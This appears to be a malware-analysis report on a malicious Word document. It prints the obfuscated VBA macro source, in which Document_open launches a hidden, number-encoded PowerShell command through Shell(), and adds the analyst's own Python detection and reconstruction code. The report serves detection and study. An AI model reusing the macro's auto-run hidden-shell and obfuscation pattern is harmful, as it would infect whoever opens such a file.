Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1093633c9f2ec469…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 92.5 KB
Created: 2018-06-13 12:44:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09
MD5: f37ac5d9005af2fd088a1a5cb5a10263
SHA-1: 9c4ffdc4a45fe815db62eb87cf30a11fcff470d1
SHA-256: 1093633c9f2ec469e0c8d4e266cfa3175625a1eddccbfbe205d4832a43c2d388
Risk score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a Word document carrying VBA macros spread over at least two modules (`SmRFupqVTMrFT` and `fQwmNLKXd`). The `Document_open` handler calls `WnosGf()`, which invokes `VBA.Shell()` with a window style of `80821 - 80821`, i.e. 0 (`vbHide`), so the spawned process gets no visible window. The command string is assembled at run time: `Chr(ZPFMpR + vbKeyP + QmhHmwK)` yields "P" (`vbKeyP` is 0x50 and neither of the other two operands is assigned anywhere in the visible source, so they evaluate to 0), followed by the literal "owers" and the return value of `jHfAM()`, which starts with "HeLL  [striNG]::JOIn('', ( '" and a long run of digit groups separated by arbitrary letters and punctuation. The visible fragments therefore spell out a `PowersHeLL` command that rebuilds its real script from those numbers at run time, which is characteristic of a downloader or dropper stage. The remaining helpers on the `Shell()` line (`lPMwjGYAF`, `cttdVwvwvs`, `PQWkfv`, `wialDwDhZ`) and the step that turns the numbers back into text lie outside the extracted preview, so the final payload and any download URL cannot be recovered from this report alone. The hundreds of `Tan()`, `CDbl()`, `Rnd()` and `Log()` assignments operate on undeclared variables under `On Error Resume Next`; they never influence the command and exist only to pad the macro and defeat simple pattern matching.

Heuristics (5)

  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    The document contains VBA macro code.
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The macro calls Shell(), which starts an external process; here its argument is a PowerShell command built from string fragments.
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    A Document_Open handler runs as soon as the document is opened with macros enabled, with no further user interaction.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier that any document with drawing objects carries; it is not a download location and is unrelated to the macro.
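The three macro findings above (auto-exec handler, Shell() call, and an auto-exec path that reaches an execution token) can be reproduced over the decoded source. The following Python is an added example written for this report, not code from the analysis platform or from oletools: it parses the procedures out of a constructed excerpt of the macro preview, walks the call graph from each auto-exec handler until it hits a process-spawning call, and adds three obfuscation signals (Chr()/vbKey character building, spliced string literals, and the share of lines that are junk arithmetic). The rule names OLE_VBA_DOCOPEN and OLE_VBA_SHELL are the report's; the weights and thresholds are this example's own and are not the model behind the risk score of 162.

```python
import re
from collections import deque

# Constructed excerpt for this example: lines copied from the macro preview in
# this report, with most of the junk-arithmetic filler removed to keep it short.
SAMPLE_VBA = '''Attribute VB_Name = "SmRFupqVTMrFT"
Function WnosGf()
On Error Resume Next
FFmiB = Tan(65466)
Cnulcw = CDbl(knXNdl)
WnosGf = JlvhnDouvN + VBA.Shell(dtFSD + Chr(ZPFMpR + vbKeyP + QmhHmwK) + "owers" + jHfAM + lPMwjGYAF + cttdVwvwvs + PQWkfv + wialDwDhZ, 80821 - 80821)
End Function
Private Sub Document_open()
On Error Resume Next
wbiNRo = Tan(83139)
WnosGf
End Sub
Attribute VB_Name = "fQwmNLKXd"
Function jHfAM()
On Error Resume Next
HInMcLML = "HeLL  [striNG" + "]::JOIn('', ( '" + "11o95-" + "73S105o102," + "105-15p18l15o"
MwDlcJT = "93S" + "78I6" + "5o" + "75{64g66{20l11-" + "107g"
End Function
'''

# Procedure names Office runs automatically (compared case-insensitively).
AUTOEXEC = {"document_open", "document_close", "autoopen", "autoexec", "autoclose",
            "auto_open", "auto_close", "workbook_open"}
PROC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\b[^\n]*\n(.*?)^\s*End\s+(?:Sub|Function)\b",
    re.I | re.M | re.S)
EXEC_RE = re.compile(r"\b(?:VBA\.)?(?:Shell|CreateObject|ShellExecute)\s*\(", re.I)
CHARCODE_RE = re.compile(r"\bChr[BW]?\s*\(|\bvbKey\w+", re.I)
LITERAL_RE = re.compile(r'"([^"\n]*)"')
JUNK_RE = re.compile(r"^\s*\w+\s*=\s*(?:Tan|CDbl|Rnd|Log)\s*\(", re.I | re.M)
NON_CODE_RE = re.compile(
    r"^(?:Attribute\b|Option\b|(?:Private\s+|Public\s+)?(?:Sub|Function)\b|End\b|On\s+Error\b)", re.I)
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")


def procedures(src):
    """Map lower-cased procedure name -> (declared name, body)."""
    return {name.lower(): (name, body) for name, body in PROC_RE.findall(src)}


def exec_chains(procs):
    """Breadth-first walk from every auto-exec procedure through the procedures
    it references; stop at the first body containing a process-execution call
    and return the call chain that reached it."""
    chains = []
    for key, (name, _) in procs.items():
        if key not in AUTOEXEC:
            continue
        queue, seen = deque([[key]]), {key}
        while queue:
            path = queue.popleft()
            body = procs[path[-1]][1]
            if EXEC_RE.search(body):
                chains.append([procs[p][0] for p in path])
                break
            for ident in IDENT_RE.findall(body):
                callee = ident.lower()
                if callee in procs and callee not in seen:
                    seen.add(callee)
                    queue.append(path + [callee])
    return chains


def triage(src):
    """Return the findings and a verdict for one decoded VBA source dump."""
    procs = procedures(src)
    lines = [l.strip() for l in src.splitlines() if l.strip()]
    code_lines = [l for l in lines if not NON_CODE_RE.match(l)]
    result = {
        "autoexec": [n for k, (n, _) in procs.items() if k in AUTOEXEC],   # OLE_VBA_DOCOPEN
        "exec_chains": exec_chains(procs),                                   # OLE_VBA_SHELL reached from auto-exec
        "charcode_refs": len(CHARCODE_RE.findall(src)),                      # Chr()/vbKey string building
        "spliced_lines": sum(1 for l in lines if len(LITERAL_RE.findall(l)) >= 3),
        "junk_ratio": len(JUNK_RE.findall(src)) / max(len(code_lines), 1),
    }
    # Weighting is this example's own, not the report's scoring model.
    score = (20 if result["autoexec"] else 0) + (40 if result["exec_chains"] else 0)
    score += 10 if result["charcode_refs"] else 0
    score += 10 if result["spliced_lines"] else 0
    score += 10 if result["junk_ratio"] >= 0.3 else 0
    result["score"] = score
    result["verdict"] = "malicious" if score >= 60 else "suspicious" if score >= 30 else "clean"
    return result


if __name__ == "__main__":
    for k, v in triage(SAMPLE_VBA).items():
        print(f"{k:14s} {v}")
```

On the excerpt the walk yields the chain Document_open -> WnosGf, which is exactly the "auto-exec reaches an execution token" condition the p-code heuristic looks for, found here in source form. The junk-ratio signal is deliberately crude: in the real dump almost every line is filler, so the ratio is far higher than in this trimmed sample.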

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13158 bytes
SHA-256: 3ac4796d4524cce0a56ed7ac8cee51a6da20366cb95654b9be532c10e27e6fe9

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "SmRFupqVTMrFT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function WnosGf()
On Error Resume Next
FFmiB = Tan(65466)
Cnulcw = CDbl(knXNdl)
SkLjM = CDbl(qRPEu * CDbl(iiXWm + Int(NOTjH * Rnd(29362)) * ciSEm * Log(36627 * Bbjjk - ANkGEA + Fix(51))))
QwPMja = Tan(44928)
ECKkR = YUqQB
DCwql = PAiNc
SCjdh = Tan(4879)
oNhkA = CDbl(VMbrM)
bPmCCo = CDbl(QbLCIj * CDbl(VoiNs + Int(KYtwpV * Rnd(8003)) * zFzbRU * Log(2437 * UuTGBm - jUFAki + Fix(51))))
HzWvo = Tan(4375)
sWOhu = oAQZM
cTntl = YwMdjV
EzYEL = Tan(18979)
TztYA = CDbl(ODQQaH)
cGjiIv = CDbl(JGJKdM * CDbl(wViPh + Int(ZJGnG * Rnd(14537)) * jFpsk * Log(42487 * qzQIow - dsMVDa + Fix(51))))
Dznwu = Tan(76425)
wWjhmW = TGUsN
awFZbi = vRtSC
vqdbU = Tan(88882)
hdEJJp = CDbl(PzMHE)
ufFrzd = CDbl(wTCFbV * CDbl(Wmvzc + Int(vNCAi * Rnd(79893)) * PiVpzW * Log(14619 * iXPRKv - zVtwN + Fix(51))))
JcHQoZ = Tan(23514)
XwXjn = dZbwv
jsOji = FhOjH
WnosGf = JlvhnDouvN + VBA.Shell(dtFSD + Chr(ZPFMpR + vbKeyP + QmhHmwK) + "owers" + jHfAM + lPMwjGYAF + cttdVwvwvs + PQWkfv + wialDwDhZ, 80821 - 80821)
znbzKH = Tan(31870)
MLfXTG = CDbl(jGZcc)
znDczt = CDbl(oSSwz * CDbl(hVuXE + Int(ibGarw * Rnd(49707)) * wXiMX * Log(41258 * cjQPuU - npmEUi + Fix(51))))
bTTrsN = Tan(56582)
HFBSGI = hwBJl
odHKi = nQonb
LqcpSd = Tan(13272)
qmvwCV = CDbl(RQQTw)
UKKTm = CDbl(DdcYYD * CDbl(UJjcrM + Int(zWUXX * Rnd(77308)) * iQLHHj * Log(71118 * mancjK - Gwhfp + Fix(51))))
zwkGPM = Tan(27247)
jUFjWA = WFjfr
WGpOjE = PYqswz
End Function
Private Sub Document_open()
On Error Resume Next
wbiNRo = Tan(83139)
KwHZXX = CDbl(wPwnGX)
kmbmZI = CDbl(RwDzFw * CDbl(iwaNRI + Int(SwjCPK * Rnd(50479)) * YfFGiq * Log(91288 * CjVzir - iYqBGh + Fix(51))))
aiSpG = Tan(57852)
wnridp = pfRMtq
wIwaKE = YJTKih
fjnUO = Tan(13050)
JakjS = CDbl(pkofZ)
ZRqdmG = CDbl(poPoqP * CDbl(vYjGE + Int(YQrGu * Rnd(38325)) * wEzjP * Log(30575 * wChdNN - iDqfZU + Fix(51))))
YUYGAT = Tan(42472)
rFUQk = bETbSR
RbsqDs = bqNBaU
WnosGf
jmthi = Tan(60780)
Wwbdpw = CDbl(ziosY)
nqkbW = CDbl(PvZJOT * CDbl(YNcQY + Int(YlQtJ * Rnd(95579)) * hswqUV * Log(90561 * djbnid - tCnfbK + Fix(51))))
CRXMOB = Tan(17532)
pbwtvK = zOKFzD
uhAdt = vsOGdV
YrsJh = Tan(93476)
uGnFlv = CDbl(luwMiG)
naClP = CDbl(ukuHqz * CDbl(RnNll + Int(FIjnz * Rnd(99901)) * DIpwv * Log(15409 * SkkGah - sfvztD + Fix(51))))
LJLzn = Tan(75417)
qHjAJ = iGvTwm
hCGLDD = dloDw
End Sub


Attribute VB_Name = "fQwmNLKXd"
Function jHfAM()
On Error Resume Next
BsZVWJ = CDbl(dNcVuj)
vdjou = Tan(47994)
YVhjh = vkAtt
qSuhP = NszzY
FnRNH = CDbl(wRJHzW * CDbl(lwZwn + Int(JANOv * Rnd(81813)) * NVDjmD * Log(75382 * vjiQY - vHPRXK + Fix(51))))
vCVmM = Tan(48190)
HInMcLML = "HeLL  [striNG" + "]::JOIn('', ( '" + "11o95-" + "73S105o102," + "105-15p18l15o" + "65l74,8" + "8o2p64S7" + "7T69g7" + "4,76-91-15S"
SapRzF = CDbl(KjaClB)
fSSiuZ = Tan(58867)
BDHJu = WStmw
cYtUoB = dfajO
bDFkaE = CDbl(DXIubz * CDbl(dJKfiv + Int(jNmKl * Rnd(75431)) * wuwLBu * Log(9789 * NiHpba - sJfLDl + Fix(51))))
IODAN = Tan(88837)
MwDlcJT = "93S" + "78I6" + "5o" + "75{64g66{20l11-" + "107g"
jopFv = CDbl(kUzQFA)
mkHAhK = Tan(70904)
IRXdVD = ZEISjR
ifENIC = HDfwRj
pKjYsW = CDbl(vOhjUp * CDbl(cZVaR + Int(UGVqT * Rnd(95626)) * DaRRiT * Log(12707 * wUIROG - CpuBO + Fix(51))))
zimrS = Tan(31224)
rCkEGGIcW = "118p108-73S70" + "T15,18T1" + "5T65g74" + "{88l2{"
rLuAP = CDbl(szqhCl)
FviaLD = Tan(89617)
HfCWi = sFZoA
HHrDN = zPwnYn
iSZZiQ = CDbl(EfJto * CDbl(GfYSp + Int(woTXZK * Rnd(72955)) * YOzGH * Log(32626 * znVEr - hpfwlO + Fix(51))))
YqTnj = Tan(90895)
PwNbDim = "64S77g6" + "9g74T7" + "6I91-15l124" + ",86o92,9" + "1-74-66I1o9" + "7I74S" + "91T1p120{7"
hIzzjC = CDbl(DJtisY)
azhvKW = Tan(23739)
MosVp = DkzwvA
wJhQn = KlaDcX
DQwQal = CDbl(osXVMT * CDbl(sPvXj + Int(KuTzh * Rnd(45537)) * ufzpc * Log(76043 * Xjiik - OYTQWJ + Fix(51))))
YKUDa 
... (truncated)
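To make concrete what the macro hands to Shell(), here is an added Python example that is not part of the report or of the sample. It concatenates the string fragments visible in the preview above the way VBA would (an unassigned variable is Empty, which contributes "" to a string and 0 to a sum, so Chr(ZPFMpR + vbKeyP + QmhHmwK) is "P"), pulls the integer sequence out of the JOIn(...) payload, and checks whether those integers are plain ASCII. Two assumptions: the four chunk variables of jHfAM() are joined in assignment order (the function's return line is beyond the truncated preview), and the helper functions that the preview does not show are omitted. decode_with_offset() is only a hypothesis-testing helper; the transform that turns the numbers into characters is in the missing part of the script and is not known.

```python
import re

# vbKeyP is the VBA key-code constant 0x50; the other two operands on the
# Shell() line are never assigned in the visible source and evaluate to 0.
VB_KEY_P = 0x50

# Fragments copied from the jHfAM() function in the macro preview. Join order
# is an assumption (assignment order); the return statement is not visible.
JHFAM_CHUNKS = [
    "HeLL  [striNG" + "]::JOIn('', ( '" + "11o95-" + "73S105o102," + "105-15p18l15o"
    + "65l74,8" + "8o2p64S7" + "7T69g7" + "4,76-91-15S",
    "93S" + "78I6" + "5o" + "75{64g66{20l11-" + "107g",
    "118p108-73S70" + "T15,18T1" + "5T65g74" + "{88l2{",
    "64S77g6" + "9g74T7" + "6I91-15l124" + ",86o92,9" + "1-74-66I1o9" + "7I74S" + "91T1p120{7",
]


def reconstruct_shell_command():
    """Visible prefix of the first argument to VBA.Shell() in WnosGf().
    lPMwjGYAF, cttdVwvwvs, PQWkfv and wialDwDhZ are not in the preview, so
    whatever they append is unknown and left out."""
    return chr(VB_KEY_P) + "owers" + "".join(JHFAM_CHUNKS)


def shell_window_style():
    """Second argument to VBA.Shell(): 80821 - 80821 = 0, i.e. vbHide."""
    return 80821 - 80821


def embedded_codes(command):
    """Integers carried in the JOIn(...) payload: digit runs separated by
    arbitrary non-digit characters (o - S , p l T g { I)."""
    payload = command.split("'", 3)[3]
    return [int(run) for run in re.findall(r"\d+", payload)]


def is_plain_ascii(codes):
    """True only if every value could be a printable character as-is."""
    return all(32 <= c < 127 for c in codes)


def longest_repeated_run(codes):
    """(length, first_index, second_index) of the longest subsequence that
    occurs twice; a repeat is consistent with the same token appearing twice
    in the decoded script."""
    best = (0, -1, -1)
    n = len(codes)
    for i in range(n):
        for j in range(i + 1, n):
            k = 0
            while j + k < n and codes[i + k] == codes[j + k]:
                k += 1
            if k > best[0]:
                best = (k, i, j)
    return best


def decode_with_offset(codes, offset):
    """Hypothesis helper (assumption, not the sample's real transform): treat
    each value as a character code shifted by `offset`, modulo 256."""
    return "".join(chr((c + offset) % 256) for c in codes)


if __name__ == "__main__":
    cmd = reconstruct_shell_command()
    codes = embedded_codes(cmd)
    print("Shell(%r..., windowstyle=%d)" % (cmd[:48], shell_window_style()))
    print(len(codes), "values, min", min(codes), "max", max(codes),
          "plain ASCII:", is_plain_ascii(codes))
    print("longest repeated run:", longest_repeated_run(codes))
```

Run as-is, it shows the command opening with PowersHeLL  [striNG]::JOIn('', ( ' followed by 60 integers between 1 and 124. Values such as 1, 2, 7 and 15 are control characters if taken literally, so the hidden remainder of the script must apply a key or lookup table before the numbers become a PowerShell command; that is why the report can state the downloader intent but not the final payload or URL. The 14-value run that recurs at offsets 6 and 33 is what a repeated cmdlet or variable name would look like under a stateless per-character transform.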